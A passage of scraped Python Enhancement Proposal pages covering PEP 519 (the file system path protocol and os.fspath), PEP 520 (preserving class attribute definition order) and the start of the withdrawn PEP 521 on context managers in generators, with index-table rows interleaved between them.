convert Python code objects into equivalent objects which are easy to
play with, and lets you convert those objects back into living Python
code objects. It’s useful for applying crazy transformations on Python
functions, and is also useful in learning Python byte code
intricacies. See byteplay documentation.
See also:
BytecodeAssembler
Copyright
This document has been placed in the public domain.
| Rejected | PEP 511 – API for code transformers | Standards Track | Propose an API to register bytecode and AST transformers. Add also -o
OPTIM_TAG command line option to change .pyc filenames, -o
noopt disables the peephole optimizer. Raise an ImportError
exception on import if the .pyc file is missing and the code
transformers required to transform the code are missing. code
transformers are not needed code transformed ahead of time (loaded from
.pyc files). |
PEP 519 – Adding a file system path protocol
Author:
Brett Cannon <brett at python.org>,
Koos Zevenhoven <k7hoven at gmail.com>
Status:
Final
Type:
Standards Track
Created:
11-May-2016
Python-Version:
3.6
Post-History:
11-May-2016,
12-May-2016,
13-May-2016
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Proposal
Protocol
Standard library changes
builtins
os
os.path
pathlib
C API
Backwards compatibility
Implementation
Rejected Ideas
Other names for the protocol’s method
Separate str/bytes methods
Providing a path attribute
Have __fspath__() only return strings
A generic string encoding mechanism
Have __fspath__ be an attribute
Provide specific type hinting support
Provide os.fspathb()
Call __fspath__() off of the instance
Acknowledgements
References
Copyright
Abstract
This PEP proposes a protocol for classes which represent a file system
path to be able to provide a str or bytes representation.
Changes to Python’s standard library are also proposed to utilize this
protocol where appropriate to facilitate the use of path objects where
historically only str and/or bytes file system paths are
accepted. The goal is to facilitate the migration of users towards
rich path objects while providing an easy way to work with code
expecting str or bytes.
Rationale
Historically in Python, file system paths have been represented as
strings or bytes. This choice of representation has stemmed from C’s
own decision to represent file system paths as
const char * [3]. While that is a totally serviceable
format to use for file system paths, it’s not necessarily optimal. At
issue is the fact that while all file system paths can be represented
as strings or bytes, not all strings or bytes represent a file system
path. This can lead to issues where any e.g. string duck-types to a
file system path whether it actually represents a path or not.
To help elevate the representation of file system paths from their
representation as strings and bytes to a richer object representation,
the pathlib module [4] was provisionally introduced in
Python 3.4 through PEP 428. While considered by some as an improvement
over strings and bytes for file system paths, it has suffered from a
lack of adoption. Typically the key issue listed for the low adoption
rate has been the lack of support in the standard library. This lack
of support required users of pathlib to manually convert path objects
to strings by calling str(path) which many found error-prone.
One issue in converting path objects to strings comes from
the fact that the only generic way to get a string representation of
the path was to pass the object to str(). This can pose a
problem when done blindly as nearly all Python objects have some
string representation whether they are a path or not, e.g.
str(None) will give a result that
builtins.open() [5] will happily use to create a new
file.
Exacerbating this whole situation is the
DirEntry object [8]. While path objects have a
representation that can be extracted using str(), DirEntry
objects expose a path attribute instead. Having no common
interface between path objects, DirEntry, and any other
third-party path library has become an issue. A solution that allows
any path-representing object to declare that it is a path and a way
to extract a low-level representation that all path objects could
support is desired.
This PEP then proposes to introduce a new protocol to be followed by
objects which represent file system paths. Providing a protocol allows
for explicit signaling of what objects represent file system paths as
well as a way to extract a lower-level representation that can be used
with older APIs which only support strings or bytes.
Discussions regarding path objects that led to this PEP can be found
in multiple threads on the python-ideas mailing list archive
[1] for the months of March and April 2016 and on
the python-dev mailing list archives [2] during
April 2016.
Proposal
This proposal is split into two parts. One part is the proposal of a
protocol for objects to declare and provide support for exposing a
file system path representation. The other part deals with changes to
Python’s standard library to support the new protocol. These changes
will also lead to the pathlib module dropping its provisional status.
Protocol
The following abstract base class defines the protocol for an object
to be considered a path object:
import abc
import typing as t

class PathLike(abc.ABC):

    """Abstract base class for implementing the file system path protocol."""

    @abc.abstractmethod
    def __fspath__(self) -> t.Union[str, bytes]:
        """Return the file system path representation of the object."""
        raise NotImplementedError
Objects representing file system paths will implement the
__fspath__() method which will return the str or bytes
representation of the path. The str representation is the
preferred low-level path representation as it is human-readable and
what people historically represent paths as.
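For illustration, a minimal class satisfying the protocol might look like the following (BackupPath is a made-up example, not part of the PEP; os.fspath() is the extraction function described below):
import os

class BackupPath:
    """Toy path object whose file system path is the wrapped name plus ".bak"."""
    def __init__(self, name):
        self.name = name
    def __fspath__(self):
        return self.name + ".bak"

assert os.fspath(BackupPath("data.txt")) == "data.txt.bak"   # requires Python 3.6+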
Standard library changes
It is expected that most APIs in Python’s standard library that
currently accept a file system path will be updated appropriately to
accept path objects (whether that requires code or simply an update
to documentation will vary). The modules mentioned below, though,
deserve specific details as they have either fundamental changes that
empower the ability to use path objects, or entail additions/removal
of APIs.
builtins
open() [5] will be updated to accept path objects as
well as continue to accept str and bytes.
os
The fspath() function will be added with the following semantics:
import typing as t

def fspath(path: t.Union[PathLike, str, bytes]) -> t.Union[str, bytes]:
    """Return the string representation of the path.

    If str or bytes is passed in, it is returned unchanged. If __fspath__()
    returns something other than str or bytes then TypeError is raised. If
    this function is given something that is not str, bytes, or os.PathLike
    then TypeError is raised.
    """
    if isinstance(path, (str, bytes)):
        return path

    # Work from the object's type to match method resolution of other magic
    # methods.
    path_type = type(path)
    try:
        path = path_type.__fspath__(path)
    except AttributeError:
        if hasattr(path_type, '__fspath__'):
            raise
    else:
        if isinstance(path, (str, bytes)):
            return path
        else:
            raise TypeError("expected __fspath__() to return str or bytes, "
                            "not " + type(path).__name__)

    raise TypeError("expected str, bytes or os.PathLike object, not "
                    + path_type.__name__)
The os.fsencode() [6] and
os.fsdecode() [7] functions will be updated to accept
path objects. As both functions coerce their arguments to
bytes and str, respectively, they will be updated to call
__fspath__() if present to convert the path object to a str or
bytes representation, and then perform their appropriate
coercion operations as if the return value from __fspath__() had
been the original argument to the coercion function in question.
The addition of os.fspath(), the updates to
os.fsencode()/os.fsdecode(), and the current semantics of
pathlib.PurePath provide the semantics necessary to
get the path representation one prefers. For a path object,
pathlib.PurePath/Path can be used. To obtain the str or
bytes representation without any coercion, then os.fspath()
can be used. If a str is desired and the encoding of bytes
should be assumed to be the default file system encoding, then
os.fsdecode() should be used. If a bytes representation is
desired and any strings should be encoded using the default file
system encoding, then os.fsencode() is used. This PEP recommends
using path objects when possible and falling back to string paths as
necessary and using bytes as a last resort.
Another way to view this is as a hierarchy of file system path
representations (highest- to lowest-level): path → str → bytes. The
functions and classes under discussion can all accept objects on the
same level of the hierarchy, but they vary in whether they promote or
demote objects to another level. The pathlib.PurePath class can
promote a str to a path object. The os.fspath() function can
demote a path object to a str or bytes instance, depending
on what __fspath__() returns.
The os.fsdecode() function will demote a path object to
a string or promote a bytes object to a str. The
os.fsencode() function will demote a path or string object to
bytes. There is no function that provides a way to demote a path
object directly to bytes while bypassing string demotion.
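A short sketch of this hierarchy in practice (assuming Python 3.6 or later):
import os
import pathlib

path = pathlib.PurePosixPath("/tmp/data.txt")
assert os.fspath(path) == "/tmp/data.txt"                # path -> str, no coercion
assert os.fsencode(path) == b"/tmp/data.txt"             # path demoted to bytes
assert os.fsdecode(b"/tmp/data.txt") == "/tmp/data.txt"  # bytes promoted to str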
The DirEntry object [8] will gain an __fspath__()
method. It will return the same value as currently found on the
path attribute of DirEntry instances.
The Protocol ABC will be added to the os module under the name
os.PathLike.
os.path
The various path-manipulation functions of os.path [9]
will be updated to accept path objects. For polymorphic functions that
accept both bytes and strings, they will be updated to simply use
os.fspath().
During the discussions leading up to this PEP it was suggested that
os.path not be updated using an “explicit is better than implicit”
argument. The thinking was that since __fspath__() is polymorphic
itself it may be better to have code working with os.path extract
the path representation from path objects explicitly. There is also
the consideration that adding support this deep into the low-level OS
APIs will lead to code magically supporting path objects without
requiring any documentation updates, leading to potential complaints
when it doesn’t work, unbeknownst to the project author.
But it is the view of this PEP that “practicality beats purity” in
this instance. To help facilitate the transition to supporting path
objects, it is better to make the transition as easy as possible than
to worry about unexpected/undocumented duck typing support for
path objects by projects.
There has also been the suggestion that os.path functions could be
used in a tight loop and the overhead of checking or calling
__fspath__() would be too costly. In this scenario only
path-consuming APIs would be directly updated and path-manipulating
APIs like the ones in os.path would go unmodified. This would
require library authors to update their code to support path objects
if they performed any path manipulations, but if the library code
passed the path straight through then the library wouldn’t need to be
updated. It is the view of this PEP and Guido, though, that this is an
unnecessary worry and that performance will still be acceptable.
pathlib
The constructor for pathlib.PurePath and pathlib.Path will be
updated to accept PathLike objects. Both PurePath and Path
will continue to not accept bytes path representations, and so if
__fspath__() returns bytes it will raise an exception.
The path attribute will be removed as this PEP makes it
redundant (it has not been included in any released version of Python
and so is not a backwards-compatibility concern).
C API
The C API will gain an equivalent function to os.fspath():
/*
  Return the file system path representation of the object.

  If the object is str or bytes, then allow it to pass through with
  an incremented refcount. If the object defines __fspath__(), then
  return the result of that method. All other types raise a TypeError.
*/
PyObject *
PyOS_FSPath(PyObject *path)
{
    _Py_IDENTIFIER(__fspath__);
    PyObject *func = NULL;
    PyObject *path_repr = NULL;

    if (PyUnicode_Check(path) || PyBytes_Check(path)) {
        Py_INCREF(path);
        return path;
    }

    func = _PyObject_LookupSpecial(path, &PyId___fspath__);
    if (NULL == func) {
        return PyErr_Format(PyExc_TypeError,
                            "expected str, bytes or os.PathLike object, "
                            "not %S",
                            path->ob_type);
    }

    path_repr = PyObject_CallFunctionObjArgs(func, NULL);
    Py_DECREF(func);
    if (!PyUnicode_Check(path_repr) && !PyBytes_Check(path_repr)) {
        Py_DECREF(path_repr);
        return PyErr_Format(PyExc_TypeError,
                            "expected __fspath__() to return str or bytes, "
                            "not %S",
                            path_repr->ob_type);
    }

    return path_repr;
}
Backwards compatibility
There are no explicit backwards-compatibility concerns. Unless an
object incidentally already defines a __fspath__() method there is
no reason to expect the pre-existing code to break or expect to have
its semantics implicitly changed.
Libraries wishing to support path objects and a version of Python
prior to Python 3.6 and the existence of os.fspath() can use the
idiom of
path.__fspath__() if hasattr(path, "__fspath__") else path.
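That idiom can be wrapped in a small helper (a sketch for libraries that must also run on older Pythons without os.fspath()):
def fspath_compat(path):
    # Use the protocol when available; pass str/bytes through unchanged.
    return path.__fspath__() if hasattr(path, "__fspath__") else path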
Implementation
This is the task list for what this PEP proposes to be changed in
Python 3.6:
Remove the path attribute from pathlib
(done)
Remove the provisional status of pathlib
(done)
Add os.PathLike
(code and
docs done)
Add PyOS_FSPath()
(code and
docs done)
Add os.fspath()
(done)
Update os.fsencode()
(done)
Update os.fsdecode()
(done)
Update pathlib.PurePath and pathlib.Path
(done)
Add __fspath__()
Add os.PathLike support to the constructors
Add __fspath__() to DirEntry
(done)
Update builtins.open()
(done)
Update os.path
(done)
Add a glossary entry for “path-like”
(done)
Update “What’s New”
(done)
Rejected Ideas
Other names for the protocol’s method
Various names were proposed during discussions leading to this PEP,
including __path__, __pathname__, and __fspathname__. In
the end people seemed to gravitate towards __fspath__ for being
unambiguous without being unnecessarily long.
Separate str/bytes methods
At one point it was suggested that __fspath__() only return
strings and another method named __fspathb__() be introduced to
return bytes. The thinking is that by making __fspath__() not be
polymorphic it could make dealing with the potential string or bytes
representations easier. But the general consensus was that returning
bytes will more than likely be rare and that the various functions in
the os module are the better abstraction to promote over direct
calls to __fspath__().
Providing a path attribute
To help deal with the issue of pathlib.PurePath not inheriting
from str, originally it was proposed to introduce a path
attribute to mirror what os.DirEntry provides. In the end,
though, it was determined that a protocol would provide the same
result while not directly exposing an API that most people will never
need to interact with directly.
Have __fspath__() only return strings
Much of the discussion that led to this PEP revolved around whether
__fspath__() should be polymorphic and return bytes as well as
str or only return str. The general sentiment for this view
was that bytes are difficult to work with due to their
inherent lack of information about their encoding and PEP 383 makes
it possible to represent all file system paths using str with the
surrogateescape handler. Thus, it would be better to forcibly
promote the use of str as the low-level path representation for
high-level path objects.
In the end, it was decided that using bytes to represent paths is
simply not going to go away and thus they should be supported to some
degree. The hope is that people will gravitate towards path objects
like pathlib and that will move people away from operating directly
with bytes.
A generic string encoding mechanism
At one point there was a discussion of developing a generic mechanism
to extract a string representation of an object that had semantic
meaning (__str__() does not necessarily return anything of
semantic significance beyond what may be helpful for debugging). In
the end, it was deemed to lack a motivating need beyond the one this
PEP is trying to solve in a specific fashion.
Have __fspath__ be an attribute
It was briefly considered to have __fspath__ be an attribute
instead of a method. This was rejected for two reasons. One,
historically protocols have been implemented as “magic methods” and
not “magic methods and attributes”. Two, there is no guarantee that
the lower-level representation of a path object will be pre-computed,
potentially misleading users that there was no expensive computation
behind the scenes in case the attribute was implemented as a property.
This also indirectly ties into the idea of introducing a path
attribute to accomplish the same thing. This idea has an added issue,
though, of accidentally having any object with a path attribute
meet the protocol’s duck typing. Introducing a new magic method for
the protocol helpfully avoids any accidental opting into the protocol.
Provide specific type hinting support
There was some consideration to providing a generic typing.PathLike
class which would allow for e.g. typing.PathLike[str] to specify
a type hint for a path object which returned a string representation.
While potentially beneficial, the usefulness was deemed too small to
bother adding the type hint class.
This also removed any desire to have a class in the typing module
which represented the union of all acceptable path-representing types
as that can be represented with
typing.Union[str, bytes, os.PathLike] easily enough and the hope
is users will slowly gravitate to path objects only.
Provide os.fspathb()
It was suggested that to mirror the structure of e.g.
os.getcwd()/os.getcwdb(), that os.fspath() only return
str and that another function named os.fspathb() be
introduced that only returned bytes. This was rejected as the
purposes of the *b() functions are tied to querying the file
system where there is a need to get the raw bytes back. As this PEP
does not work directly with data on a file system (but which may
be), the view was taken that this distinction is unnecessary. It’s also
believed that the need for only bytes will not be common enough to
need to support in such a specific manner as os.fsencode() will
provide similar functionality.
Call __fspath__() off of the instance
An earlier draft of this PEP had os.fspath() calling
path.__fspath__() instead of type(path).__fspath__(path). The
changed to be consistent with how other magic methods in Python are
resolved.
Acknowledgements
Thanks to everyone who participated in the various discussions related
to this PEP that spanned both python-ideas and python-dev. Special
thanks to Stephen Turnbull for direct feedback on early drafts of this
PEP. More special thanks to Koos Zevenhoven and Ethan Furman for not
only feedback on early drafts of this PEP but also helping to drive
the overall discussion on this topic across the two mailing lists.
References
[1]
The python-ideas mailing list archive
(https://mail.python.org/pipermail/python-ideas/)
[2]
The python-dev mailing list archive
(https://mail.python.org/pipermail/python-dev/)
[3]
open() documentation for the C standard library
(http://www.gnu.org/software/libc/manual/html_node/Opening-and-Closing-Files.html)
[4]
The pathlib module
(https://docs.python.org/3/library/pathlib.html#module-pathlib)
[5] (1, 2)
The builtins.open() function
(https://docs.python.org/3/library/functions.html#open)
[6]
The os.fsencode() function
(https://docs.python.org/3/library/os.html#os.fsencode)
[7]
The os.fsdecode() function
(https://docs.python.org/3/library/os.html#os.fsdecode)
[8] (1, 2)
The os.DirEntry class
(https://docs.python.org/3/library/os.html#os.DirEntry)
[9]
The os.path module
(https://docs.python.org/3/library/os.path.html#module-os.path)
Copyright
This document has been placed in the public domain.
| Final | PEP 519 – Adding a file system path protocol | Standards Track | This PEP proposes a protocol for classes which represent a file system
path to be able to provide a str or bytes representation.
Changes to Python’s standard library are also proposed to utilize this
protocol where appropriate to facilitate the use of path objects where
historically only str and/or bytes file system paths are
accepted. The goal is to facilitate the migration of users towards
rich path objects while providing an easy way to work with code
expecting str or bytes. |
PEP 520 – Preserving Class Attribute Definition Order
Author:
Eric Snow <ericsnowcurrently at gmail.com>
Status:
Final
Type:
Standards Track
Created:
07-Jun-2016
Python-Version:
3.6
Post-History:
07-Jun-2016, 11-Jun-2016, 20-Jun-2016, 24-Jun-2016
Resolution:
Python-Dev message
Table of Contents
Abstract
Motivation
Background
Specification
Why a tuple?
Why not a read-only attribute?
Why not “__attribute_order__”?
Why not ignore “dunder” names?
Why None instead of an empty tuple?
Why None instead of not setting the attribute?
Why constrain manually set values?
Why not hide __definition_order__ on non-type objects?
What about __slots__?
Why is __definition_order__ even necessary?
Support for C-API Types
Compatibility
Changes
Other Python Implementations
Implementation
Alternatives
An Order-preserving cls.__dict__
A “namespace” Keyword Arg for Class Definition
A stdlib Metaclass that Implements __prepare__() with OrderedDict
Set __definition_order__ at Compile-time
References
Copyright
Note
Since compact dict has landed in 3.6, __definition_order__
has been removed. cls.__dict__ now mostly accomplishes the same
thing instead.
Abstract
The class definition syntax is ordered by its very nature. Class
attributes defined there are thus ordered. Aside from helping with
readability, that ordering is sometimes significant. If it were
automatically available outside the class definition then the
attribute order could be used without the need for extra boilerplate
(such as metaclasses or manually enumerating the attribute order).
Given that this information already exists, access to the definition
order of attributes is a reasonable expectation. However, currently
Python does not preserve the attribute order from the class
definition.
This PEP changes that by preserving the order in which attributes
are introduced in the class definition body. That order will now be
preserved in the __definition_order__ attribute of the class.
This allows introspection of the original definition order, e.g. by
class decorators.
Additionally, this PEP requires that the default class definition
namespace be ordered (e.g. OrderedDict) by default. The
long-lived class namespace (__dict__) will remain a dict.
Motivation
The attribute order from a class definition may be useful to tools
that rely on name order. However, without the automatic availability
of the definition order, those tools must impose extra requirements on
users. For example, use of such a tool may require that your class use
a particular metaclass. Such requirements are often enough to
discourage use of the tool.
Some tools that could make use of this PEP include:
documentation generators
testing frameworks
CLI frameworks
web frameworks
config generators
data serializers
enum factories (my original motivation)
Background
When a class is defined using a class statement, the class body
is executed within a namespace. Currently that namespace defaults to
dict. If the metaclass defines __prepare__() then the result
of calling it is used for the class definition namespace.
After the execution completes, the definition namespace is
copied into a new dict. Then the original definition namespace is
discarded. The new copy is stored away as the class’s namespace and
is exposed as __dict__ through a read-only proxy.
The class attribute definition order is represented by the insertion
order of names in the definition namespace. Thus, we can have
access to the definition order by switching the definition namespace
to an ordered mapping, such as collections.OrderedDict. This is
feasible using a metaclass and __prepare__, as described above.
In fact, this is by far the most common use case for
__prepare__.
At that point, the only missing thing for later access to the
definition order is storing it on the class before the definition
namespace is thrown away. Again, this may be done using a metaclass.
However, this means that the definition order is preserved only for
classes that use such a metaclass. There are two practical problems
with that:
First, it requires the use of a metaclass. Metaclasses introduce an
extra level of complexity to code and in some cases (e.g. conflicts)
are a problem. So reducing the need for them is worth doing when the
opportunity presents itself. PEP 422 and PEP 487 discuss this at
length. We have such an opportunity by using an ordered mapping (e.g.
OrderedDict for CPython at least) for the default class definition
namespace, virtually eliminating the need for __prepare__().
Second, only classes that opt in to using the OrderedDict-based
metaclass will have access to the definition order. This is problematic
for cases where universal access to the definition order is important.
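As a rough sketch of the boilerplate this PEP aims to make unnecessary (the metaclass name and the _order attribute are invented for the example), capturing the definition order today requires something like:
from collections import OrderedDict

class OrderedMeta(type):
    @classmethod
    def __prepare__(mcls, name, bases):
        # Use an ordered mapping for the class definition namespace.
        return OrderedDict()

    def __new__(mcls, name, bases, namespace):
        cls = super().__new__(mcls, name, bases, dict(namespace))
        # Record the order before the definition namespace is discarded.
        cls._order = tuple(namespace)
        return cls

class Example(metaclass=OrderedMeta):
    ham = None
    eggs = 5

print(Example._order)  # ('__module__', '__qualname__', 'ham', 'eggs')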
Specification
Part 1:
all classes have a __definition_order__ attribute
__definition_order__ is a tuple of identifiers (or None)
__definition_order__ is always set:
during execution of the class body, the insertion order of names
into the class definition namespace is stored in a tuple
if __definition_order__ is defined in the class body then it
must be a tuple of identifiers or None; any other value
will result in TypeError
classes that do not have a class definition (e.g. builtins) have
their __definition_order__ set to None
classes for which __prepare__() returned something other than
OrderedDict (or a subclass) have their __definition_order__
set to None (except where #2 applies)
Not changing:
dir() will not depend on __definition_order__
descriptors and custom __getattribute__ methods are unconstrained
regarding __definition_order__
Part 2:
the default class definition namespace is now an ordered mapping
(e.g. OrderedDict)
cls.__dict__ does not change, remaining a read-only proxy around
dict
Note that Python implementations which have an ordered dict won’t
need to change anything.
The following code demonstrates roughly equivalent semantics for both
parts 1 and 2:
class Meta(type):
@classmethod
def __prepare__(cls, *args, **kwargs):
return OrderedDict()
class Spam(metaclass=Meta):
ham = None
eggs = 5
__definition_order__ = tuple(locals())
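As a consumer-side illustration (the decorator and its fields attribute are invented for this example; because __definition_order__ never actually shipped, the snippet uses the manual emulation above and falls back to __dict__ insertion order):
def public_fields(cls):
    # Read the definition order if present, otherwise fall back to the
    # class namespace's insertion order.
    order = getattr(cls, "__definition_order__", None) or tuple(vars(cls))
    cls.fields = tuple(
        name for name in order
        if not (name.startswith("__") and name.endswith("__"))
    )
    return cls

@public_fields
class Spam:
    ham = None
    eggs = 5
    __definition_order__ = tuple(locals())  # manual emulation, as above

print(Spam.fields)  # ('ham', 'eggs')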
Why a tuple?
Use of a tuple reflects the fact that we are exposing the order in
which attributes on the class were defined. Since the definition
is already complete by the time __definition_order__ is set, the
content and order of the value won’t be changing. Thus we use a type
that communicates that state of immutability.
Why not a read-only attribute?
There are some valid arguments for making __definition_order__
a read-only attribute (like cls.__dict__ is). Most notably, a
read-only attribute conveys the nature of the attribute as “complete”,
which is exactly correct for __definition_order__. Since it
represents the state of a particular one-time event (execution of
the class definition body), allowing the value to be replaced would
reduce confidence that the attribute corresponds to the original class
body. Furthermore, often an immutable-by-default approach helps to
make data easier to reason about.
However, in this case there still isn’t a strong reason to counter
the well-worn precedent found in Python. Per Guido:
I don't see why it needs to be a read-only attribute. There are
very few of those -- in general we let users play around with
things unless we have a hard reason to restrict assignment (e.g.
the interpreter's internal state could be compromised). I don't
see such a hard reason here.
Also, note that a writeable __definition_order__ allows dynamically
created classes (e.g. by Cython) to still have __definition_order__
properly set. That could certainly be handled through specific
class-creation tools, such as type() or the C-API, without the need
to lose the semantics of a read-only attribute. However, with a
writeable attribute it’s a moot point.
Why not “__attribute_order__”?
__definition_order__ is centered on the class definition
body. The use cases for dealing with the class namespace (__dict__)
post-definition are a separate matter. A name like
__attribute_order__ would misleadingly suggest a feature covering
more than just the class definition.
Why not ignore “dunder” names?
Names starting and ending with “__” are reserved for use by the
interpreter. In practice they should not be relevant to the users of
__definition_order__. Instead, for nearly everyone they would only
be clutter, causing the same extra work (filtering out the dunder
names) for the majority. In cases where a dunder name is significant,
the class definition could manually set __definition_order__,
making the common case simpler.
However, leaving dunder names out of __definition_order__ means
that their place in the definition order would be unrecoverably lost.
Dropping dunder names by default may inadvertently cause problems for
classes that use dunder names unconventionally. In this case it’s
better to play it safe and preserve all the names from the class
definition. This isn’t a big problem since it is easy to filter out
dunder names:
(name for name in cls.__definition_order__
if not (name.startswith('__') and name.endswith('__')))
In fact, in some application contexts there may be other criteria on
which similar filtering would be applied, such as ignoring any name
starting with “_”, leaving out all methods, or including only
descriptors. Ultimately dunder names aren’t a special enough case to
be treated exceptionally.
Note that a couple of dunder names (__name__ and __qualname__)
are injected by default by the compiler. So they will be included even
though they are not strictly part of the class definition body.
Why None instead of an empty tuple?
A key objective of adding __definition_order__ is to preserve
information in class definitions which was lost prior to this PEP.
One consequence is that __definition_order__ implies an original
class definition. Using None allows us to clearly distinguish
classes that do not have a definition order. An empty tuple clearly
indicates a class that came from a definition statement but did not
define any attributes there.
Why None instead of not setting the attribute?
The absence of an attribute requires more complex handling than None
does for consumers of __definition_order__.
Why constrain manually set values?
If __definition_order__ is manually set in the class body then it
will be used. We require it to be a tuple of identifiers (or None)
so that consumers of __definition_order__ may have a consistent
expectation for the value. That helps maximize the feature’s
usefulness.
We could also allow an arbitrary iterable for a manually set
__definition_order__ and convert it into a tuple. However, not
all iterables infer a definition order (e.g. set). So we opt in
favor of requiring a tuple.
Why not hide __definition_order__ on non-type objects?
Python doesn’t make much effort to hide class-specific attributes
during lookup on instances of classes. While it may make sense
to consider __definition_order__ a class-only attribute, hidden
during lookup on objects, setting precedent in that regard is
beyond the goals of this PEP.
What about __slots__?
__slots__ will be added to __definition_order__ like any
other name in the class definition body. The actual slot names
will not be added to __definition_order__ since they aren’t
set as names in the definition namespace.
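For example (again using the manual emulation from the specification section, since the attribute never shipped), only the name __slots__ itself appears, not the individual slot names:
class Point:
    __slots__ = ("x", "y")
    __definition_order__ = tuple(locals())  # manual emulation

print(Point.__definition_order__)
# ('__module__', '__qualname__', '__slots__') -- 'x' and 'y' are absent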
Why is __definition_order__ even necessary?
Since the definition order is not preserved in __dict__, it is
lost once class definition execution completes. Classes could
explicitly set the attribute as the last thing in the body. However,
then independent decorators could only make use of classes that had done
so. Instead, __definition_order__ preserves this one bit of info
from the class body so that it is universally available.
Support for C-API Types
Arguably, most C-defined Python types (e.g. built-in, extension modules)
have a roughly equivalent concept of a definition order. So conceivably
__definition_order__ could be set for such types automatically. This
PEP does not introduce any such support, nor does it prohibit it.
In any case, since __definition_order__ can be set at any
time through normal attribute assignment, it does not need any special
treatment in the C-API.
The specific cases:
builtin types
PyType_Ready
PyType_FromSpec
Compatibility
This PEP does not break backward compatibility, except in the case that
someone relies strictly on dict as the class definition namespace.
This shouldn’t be a problem since issubclass(OrderedDict, dict) is
true.
Changes
In addition to the class syntax, the following expose the new behavior:
builtins.__build_class__
types.prepare_class
types.new_class
Also, the 3-argument form of builtins.type() will allow inclusion
of __definition_order__ in the namespace that gets passed in. It
will be subject to the same constraints as when __definition_order__
is explicitly defined in the class body.
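A hedged illustration of that form (under the proposal type() would validate the value; on released Pythons it is simply stored as an ordinary class attribute):
ns = {
    "ham": None,
    "eggs": 5,
    "__definition_order__": ("ham", "eggs"),  # must be a tuple of identifiers or None
}
Spam = type("Spam", (), ns)
print(Spam.__definition_order__)  # ('ham', 'eggs')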
Other Python Implementations
Pending feedback, the impact on Python implementations is expected to
be minimal. All conforming implementations are expected to set
__definition_order__ as described in this PEP.
Implementation
The implementation is found in the
tracker.
Alternatives
An Order-preserving cls.__dict__
Instead of storing the definition order in __definition_order__,
the now-ordered definition namespace could be copied into a new
OrderedDict. This would then be used as the mapping proxied as
__dict__. Doing so would mostly provide the same semantics.
However, using OrderedDict for __dict__ would obscure the
relationship with the definition namespace, making it less useful.
Additionally, (in the case of OrderedDict specifically) doing
this would require significant changes to the semantics of the
concrete dict C-API.
There has been some discussion about moving to a compact dict
implementation which would (mostly) preserve insertion order. However
the lack of an explicit __definition_order__ would still remain
as a pain point.
A “namespace” Keyword Arg for Class Definition
PEP 422
introduced a new “namespace” keyword arg to class definitions
that effectively replaces the need for __prepare__().
However, the proposal was withdrawn in favor of the simpler PEP 487.
A stdlib Metaclass that Implements __prepare__() with OrderedDict
This has all the same problems as writing your own metaclass. The
only advantage is that you don’t have to actually write this
metaclass. So it doesn’t offer any benefit in the context of this
PEP.
Set __definition_order__ at Compile-time
Each class’s __qualname__ is determined at compile-time.
This same concept could be applied to __definition_order__.
The result of composing __definition_order__ at compile-time
would be nearly the same as doing so at run-time.
Comparative implementation difficulty aside, the key difference
would be that at compile-time it would not be practical to
preserve definition order for attributes that are set dynamically
in the class body (e.g. locals()[name] = value). However,
they should still be reflected in the definition order. One
possible resolution would be to require class authors to manually
set __definition_order__ if they define any class attributes
dynamically.
Ultimately, the use of OrderedDict at run-time or compile-time
discovery is almost entirely an implementation detail.
References
Original discussion
Follow-up 1
Follow-up 2
Alyssa (Nick) Coghlan’s concerns about mutability
Copyright
This document has been placed in the public domain.
| Final | PEP 520 – Preserving Class Attribute Definition Order | Standards Track | The class definition syntax is ordered by its very nature. Class
attributes defined there are thus ordered. Aside from helping with
readability, that ordering is sometimes significant. If it were
automatically available outside the class definition then the
attribute order could be used without the need for extra boilerplate
(such as metaclasses or manually enumerating the attribute order).
Given that this information already exists, access to the definition
order of attributes is a reasonable expectation. However, currently
Python does not preserve the attribute order from the class
definition. |
PEP 521 – Managing global context via ‘with’ blocks in generators and coroutines
Author:
Nathaniel J. Smith <njs at pobox.com>
Status:
Withdrawn
Type:
Standards Track
Created:
27-Apr-2015
Python-Version:
3.6
Post-History:
29-Apr-2015
Table of Contents
PEP Withdrawal
Abstract
Specification
Nested blocks
Other changes
Rationale
Alternative approaches
Backwards compatibility
Interaction with PEP 492
References
Copyright
PEP Withdrawal
Withdrawn in favor of PEP 567.
Abstract
While we generally try to avoid global state when possible, there
nonetheless exist a number of situations where it is agreed to be the
best approach. In Python, a standard pattern for handling such cases
is to store the global state in global or thread-local storage, and
then use with blocks to limit modifications of this global state
to a single dynamic scope. Examples where this pattern is used include
the standard library’s warnings.catch_warnings and
decimal.localcontext, NumPy’s numpy.errstate (which exposes
the error-handling settings provided by the IEEE 754 floating point
standard), and the handling of logging context or HTTP request context
in many server application frameworks.
However, there is currently no ergonomic way to manage such local
changes to global state when writing a generator or coroutine. For
example, this code:
def f():
with warnings.catch_warnings():
for x in g():
yield x
may or may not successfully catch warnings raised by g(), and may
or may not inadvertently swallow warnings triggered elsewhere in the
code. The context manager, which was intended to apply only to f
and its callees, ends up having a dynamic scope that encompasses
arbitrary and unpredictable parts of its callers. This problem
becomes particularly acute when writing asynchronous code, where
essentially all functions become coroutines.
Here, we propose to solve this problem by notifying context managers
whenever execution is suspended or resumed within their scope,
allowing them to restrict their effects appropriately.
Specification
Two new, optional, methods are added to the context manager protocol:
__suspend__ and __resume__. If present, these methods will be
called whenever a frame’s execution is suspended or resumed from
within the context of the with block.
More formally, consider the following code:
with EXPR as VAR:
PARTIAL-BLOCK-1
f((yield foo))
PARTIAL-BLOCK-2
Currently this is equivalent to the following code (copied from PEP 343):
mgr = (EXPR)
exit = type(mgr).__exit__ # Not calling it yet
value = type(mgr).__enter__(mgr)
exc = True
try:
try:
VAR = value # Only if "as VAR" is present
PARTIAL-BLOCK-1
f((yield foo))
PARTIAL-BLOCK-2
except:
exc = False
if not exit(mgr, *sys.exc_info()):
raise
finally:
if exc:
exit(mgr, None, None, None)
This PEP proposes to modify with block handling to instead become:
mgr = (EXPR)
exit = type(mgr).__exit__ # Not calling it yet
### --- NEW STUFF ---
if the_block_contains_yield_points: # known statically at compile time
suspend = getattr(type(mgr), "__suspend__", lambda mgr: None)
resume = getattr(type(mgr), "__resume__", lambda mgr: None)
### --- END OF NEW STUFF ---
value = type(mgr).__enter__(mgr)
exc = True
try:
try:
VAR = value # Only if "as VAR" is present
PARTIAL-BLOCK-1
### --- NEW STUFF ---
suspend(mgr)
tmp = yield foo
resume(mgr)
f(tmp)
### --- END OF NEW STUFF ---
PARTIAL-BLOCK-2
except:
exc = False
if not exit(mgr, *sys.exc_info()):
raise
finally:
if exc:
exit(mgr, None, None, None)
Analogous suspend/resume calls are also wrapped around the yield
points embedded inside the yield from, await, async with,
